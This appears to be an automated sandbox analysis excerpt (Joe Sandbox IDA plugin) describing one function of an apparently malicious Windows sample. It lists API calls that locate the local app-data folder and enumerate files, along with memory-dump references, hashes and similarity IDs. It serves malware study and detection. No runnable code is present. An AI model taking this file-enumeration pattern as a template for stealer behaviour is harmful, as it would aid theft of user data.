                        Function 00E34F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E38DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E38E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 00E34F7A
                        • lstrcat.KERNEL32(?,00E41070), ref: 00E34F97
                        • lstrcat.KERNEL32(?,01968B10), ref: 00E34FAB
                        • lstrcat.KERNEL32(?,00E41074), ref: 00E34FBD
                          • Part of subcall function 00E34910: wsprintfA.USER32 ref: 00E3492C
                          • Part of subcall function 00E34910: FindFirstFileA.KERNEL32(?,?), ref: 00E34943
                          • Part of subcall function 00E34910: StrCmpCA.SHLWAPI(?,00E40FDC), ref: 00E34971
                          • Part of subcall function 00E34910: StrCmpCA.SHLWAPI(?,00E40FE0), ref: 00E34987
                          • Part of subcall function 00E34910: FindNextFileA.KERNEL32(000000FF,?), ref: 00E34B7D
                          • Part of subcall function 00E34910: FindClose.KERNEL32(000000FF), ref: 00E34B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: 11772075343a27a19983d3ad857661b9942b3a0dfc96f5d933fc1ca526f87893
                        • Instruction ID: fc9ecaf4004b4fb909e2086a603320bec9efe3f97d53f5e557a7186c83cc701e
                        • Opcode Fuzzy Hash: 11772075343a27a19983d3ad857661b9942b3a0dfc96f5d933fc1ca526f87893
                        • Instruction Fuzzy Hash: 432177B6A00204ABC764F760EC4AEED377CAB94300F005594F699B3185EE7596C8CB91